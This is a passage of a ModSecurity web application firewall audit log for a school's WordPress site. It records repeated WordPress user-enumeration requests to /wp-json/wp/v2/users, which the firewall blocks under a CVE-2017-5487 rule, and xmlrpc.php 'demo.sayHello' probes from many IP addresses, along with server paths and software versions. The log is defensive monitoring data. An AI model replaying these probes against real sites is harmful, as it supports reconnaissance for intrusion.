(X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --36e8fb79-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --36e8fb79-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746658032851815 3503 (- - -) Stopwatch2: 1746658032851815 3503; combined=1523, p1=547, p2=943, p3=0, p4=0, p5=32, sr=120, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --36e8fb79-Z-- --94d0630a-A-- [08/May/2025:05:47:22 +0700] aBvi-sP9GxxPAbCroFbMDwAAAEs 103.236.140.4 39556 103.236.140.4 8181 --94d0630a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.90.60 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.90.60 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --94d0630a-C-- demo.sayHello --94d0630a-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --94d0630a-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746658042064050 5241 (- - -) Stopwatch2: 1746658042064050 5241; combined=3936, p1=479, p2=3244, p3=29, p4=25, p5=93, sr=86, sw=66, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --94d0630a-Z-- --47f00039-A-- [08/May/2025:05:49:24 +0700] aBvjdKcs1DvJ_HgMHE_wjAAAABI 103.236.140.4 39562 103.236.140.4 8181 --47f00039-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.110.125 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.110.125 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --47f00039-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --47f00039-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746658164199747 3285 (- - -) Stopwatch2: 1746658164199747 3285; combined=1442, p1=505, p2=904, p3=0, p4=0, p5=33, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --47f00039-Z-- --c07de70d-A-- [08/May/2025:05:49:31 +0700] aBvje8P9GxxPAbCroFbMEQAAAEQ 103.236.140.4 39566 103.236.140.4 8181 --c07de70d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.110.125 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.110.125 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --c07de70d-C-- demo.sayHello --c07de70d-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --c07de70d-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746658171438897 5048 (- - -) Stopwatch2: 1746658171438897 5048; combined=3766, p1=452, p2=3111, p3=22, p4=23, p5=92, sr=67, sw=66, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c07de70d-Z-- --ae70be06-A-- [08/May/2025:05:51:56 +0700] aBvkDCs5rYyn3jlLjjK9gAAAANg 103.236.140.4 39590 103.236.140.4 8181 --ae70be06-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 41.215.213.192 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 41.215.213.192 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --ae70be06-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ae70be06-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746658316379499 3564 (- - -) Stopwatch2: 1746658316379499 3564; combined=1494, p1=480, p2=981, p3=0, p4=0, p5=32, sr=76, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ae70be06-Z-- --c5884168-A-- [08/May/2025:05:58:22 +0700] aBvljo4K347NtBcwXKwDvQAAAIA 103.236.140.4 39616 103.236.140.4 8181 --c5884168-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 103.157.160.113 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.157.160.113 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --c5884168-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c5884168-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746658702938514 3312 (- - -) Stopwatch2: 1746658702938514 3312; combined=1460, p1=475, p2=953, p3=0, p4=0, p5=32, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c5884168-Z-- --ec871531-A-- [08/May/2025:06:20:23 +0700] aBvqtys5rYyn3jlLjjK9lgAAANc 103.236.140.4 39952 103.236.140.4 8181 --ec871531-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.177.92 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.177.92 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --ec871531-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ec871531-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746660023310495 3006 (- - -) Stopwatch2: 1746660023310495 3006; combined=1258, p1=448, p2=775, p3=0, p4=0, p5=35, sr=102, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ec871531-Z-- --9a4af54d-A-- [08/May/2025:06:20:25 +0700] aBvquSs5rYyn3jlLjjK9mAAAAMA 103.236.140.4 39984 103.236.140.4 8181 --9a4af54d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.177.92 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.177.92 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --9a4af54d-C-- demo.sayHello --9a4af54d-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --9a4af54d-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746660025429710 6475 (- - -) Stopwatch2: 1746660025429710 6475; combined=4684, p1=623, p2=3820, p3=40, p4=43, p5=94, sr=77, sw=64, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9a4af54d-Z-- --d2f81d7c-A-- [08/May/2025:06:25:58 +0700] aBvsBis5rYyn3jlLjjK-WQAAAMo 103.236.140.4 41482 103.236.140.4 8181 --d2f81d7c-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.248.81.31 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.81.31 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --d2f81d7c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d2f81d7c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746660358124151 3511 (- - -) Stopwatch2: 1746660358124151 3511; combined=1452, p1=471, p2=949, p3=0, p4=0, p5=32, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d2f81d7c-Z-- --34a6ec04-A-- [08/May/2025:06:26:03 +0700] aBvsCys5rYyn3jlLjjK-WwAAAM8 103.236.140.4 41486 103.236.140.4 8181 --34a6ec04-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.248.81.31 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.81.31 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --34a6ec04-C-- demo.sayHello --34a6ec04-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --34a6ec04-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746660363958682 6616 (- - -) Stopwatch2: 1746660363958682 6616; combined=4818, p1=619, p2=3954, p3=40, p4=44, p5=97, sr=74, sw=64, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --34a6ec04-Z-- --ea329772-A-- [08/May/2025:06:33:49 +0700] aBvt3Ss5rYyn3jlLjjK-aQAAAMk 103.236.140.4 41524 103.236.140.4 8181 --ea329772-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.90.115 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.90.115 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --ea329772-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ea329772-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746660829282053 3283 (- - -) Stopwatch2: 1746660829282053 3283; combined=1441, p1=497, p2=910, p3=0, p4=0, p5=34, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ea329772-Z-- --efe4926b-A-- [08/May/2025:06:33:55 +0700] aBvt4ys5rYyn3jlLjjK-awAAAMo 103.236.140.4 41528 103.236.140.4 8181 --efe4926b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.90.115 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.90.115 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --efe4926b-C-- demo.sayHello --efe4926b-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --efe4926b-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746660835187869 6628 (- - -) Stopwatch2: 1746660835187869 6628; combined=4719, p1=611, p2=3866, p3=35, p4=40, p5=99, sr=79, sw=68, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --efe4926b-Z-- --66ef3d5e-A-- [08/May/2025:07:17:03 +0700] aBv3_ys5rYyn3jlLjjK-rQAAANA 103.236.140.4 41802 103.236.140.4 8181 --66ef3d5e-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 186.180.21.19 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 186.180.21.19 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --66ef3d5e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --66ef3d5e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746663423748790 3011 (- - -) Stopwatch2: 1746663423748790 3011; combined=1302, p1=446, p2=828, p3=0, p4=0, p5=28, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --66ef3d5e-Z-- --08cdf441-A-- [08/May/2025:07:23:50 +0700] aBv5lo4K347NtBcwXKwFQwAAAIs 103.236.140.4 41832 103.236.140.4 8181 --08cdf441-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.79.212 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.79.212 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --08cdf441-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --08cdf441-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746663830216163 3536 (- - -) Stopwatch2: 1746663830216163 3536; combined=1510, p1=542, p2=930, p3=0, p4=0, p5=38, sr=143, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --08cdf441-Z-- --23f9fa14-A-- [08/May/2025:07:23:55 +0700] aBv5m6cs1DvJ_HgMHE_xeAAAAAE 103.236.140.4 41836 103.236.140.4 8181 --23f9fa14-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.79.212 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.79.212 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --23f9fa14-C-- demo.sayHello --23f9fa14-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --23f9fa14-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746663835939861 4771 (- - -) Stopwatch2: 1746663835939861 4771; combined=3739, p1=489, p2=2988, p3=23, p4=24, p5=153, sr=69, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --23f9fa14-Z-- --85da726a-A-- [08/May/2025:07:24:18 +0700] aBv5ssP9GxxPAbCroFbMiQAAAEA 103.236.140.4 41840 103.236.140.4 8181 --85da726a-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.100.109 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.100.109 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --85da726a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --85da726a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746663858140776 3311 (- - -) Stopwatch2: 1746663858140776 3311; combined=1448, p1=504, p2=911, p3=0, p4=0, p5=32, sr=80, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --85da726a-Z-- --92cb9112-A-- [08/May/2025:07:24:25 +0700] aBv5uY4K347NtBcwXKwFRgAAAJI 103.236.140.4 41846 103.236.140.4 8181 --92cb9112-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.100.109 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.100.109 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --92cb9112-C-- demo.sayHello --92cb9112-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --92cb9112-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746663865643497 6832 (- - -) Stopwatch2: 1746663865643497 6832; combined=4892, p1=671, p2=3971, p3=37, p4=40, p5=102, sr=118, sw=71, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --92cb9112-Z-- --ed4d297b-A-- [08/May/2025:07:24:54 +0700] aBv51o4K347NtBcwXKwFRwAAAI8 103.236.140.4 41850 103.236.140.4 8181 --ed4d297b-B-- GET /wp-json/wp/v2/users HTTP/1.0 